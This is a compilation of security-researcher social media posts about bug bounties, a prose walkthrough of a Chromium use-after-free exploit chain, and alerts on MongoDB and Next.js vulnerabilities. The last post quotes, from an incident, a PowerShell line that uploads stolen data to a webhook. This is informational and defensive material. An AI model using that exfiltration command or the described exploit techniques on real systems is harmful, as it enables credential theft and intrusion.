Found a cool bug at Meta.
From misconfigured Grafana instance to R/W access on 507 private Meta repositories.
Wrote up the full chain here:
https://t.co/LYQ0prc68d
$157k bounty awarded by @metabugbounty
One of our most highly anticipated episodes, enjoy it!
...Let's learn how to train our Claudes :p ty @rez0__
Building Claude Skills as a Bug Bounty Hunter, part 1
$312,500 worth of stored/reflected XSS vulnerabilities in Meta’s Conversions API Gateway allowed Javascript code to run on any Facebook domain and millions of third-party websites. The flaw enabled zero-click Facebook account takeover and more:
https://t.co/7gWpR4LQ8x
A $100k bounty! That is a good resource for learning about Chromium exploitation. I will write a summary, but please don't take it as absolute truth, as I may have made mistakes. I am just trying to understand it.
Essentially, the code sets a flag to true. During the connection cleanup process, if this flag is set, the system doesn't close the connection. The developers assumed this was safe because the object was about to be destroyed anyway. While it is destroyed, a reference to the Connection object remains.
To exploit this, you trigger a race condition: you must open a connection immediately after the flag is set to true, but before Chromium frees the object. If successful, you are left with a dangling pointer as soon as the cleanup functions run. You now get a pointer referencing a memory space that the OS and Chromium consider free. That is dangerous, though not yet a vulnerability.
Next, you must occupy that freed space with malicious data. You want to write to that memory location and control exactly what is stored there. The researcher got this using heap spraying, aka allocating a large number of objects of a specific size to increase the chances of filling that specific slot. With the dangling pointer still active, the browser treats the new data as the original Connection object, effectively tricking it because the attacker wrote a string there. He made this because it's easy to control the string's data.
The browser thinks, "This pointer leads to a Connection object. I can trust the data here." In reality, the attacker has filled that spot with a "fake object." When the browser attempts to use that pointer to call a function, it reads the data at that address to determine where to go.
From there, the researcher proceeds to standard ROP exploitation, abusing C++ vtables and some interesting JS specific quirks to achieve RCE.
It was pretty interesting to explore this report. It gave me FOMO because I feel like I could find these, but at the same time, I can see there are many years of exploitation experience involved.
MongoBleed (CVE-2025-14847) is basically Heartbleed for MongoDB
- unauthenticated memory disclosure
- public POC, trivial to exploit
- leaks creds, tokens, cloud keys straight from RAM
- huge exposed surface on the internet
Good writeups and technical details here:
https://t.co/LgK4RABmJu
https://t.co/DWtByJQ3au
https://t.co/LUwfnF6uXG
Patch fast, rotate secrets, and assume exposed instances were scanned(!)
🚨React/Next.js CVE-2025-55182
Web3 frontends are being targeted with heavily obfuscated JS/wallet drainers.
Attackers are stealing user crypto assets. Be extremely cautious.
#React#Nextjs#Web3#Security
[1] CVE-2025-66478 exploited in the wild. Following up on Tyler Hudak post on #React2Shell, I found a log file from a compromised Next.js app. Cryptominer runs 3-stage attack: kill competitors, deploy miner, persist with watchdog. https://t.co/jYJyOxAhmD
Our security research team created a high fidelity check for the Next.js/RSC RCE (CVE-2025-55182 & CVE-2025-66478). Read more on our blog here: https://t.co/MO5Lw1ZBLK
We (@akamai_research) often see these CSP bypass attempts.
Example for https://t.co/0tO2wfnsdO w/OOB beaconing/blind XSS
References:
https://t.co/4E6T3L6uCK
https://t.co/9nVWGSotSS
1/ Using webhooks to dump stolen credentials or information about a compromised system is not new. [1]
In an incident a few weeks ago, we also saw a PSH script that used this mechanism:
New-Object https://t.co/thDhSigJT3.WebClient).UploadString("https://t.co/RlJ3usDiTE..")
🧵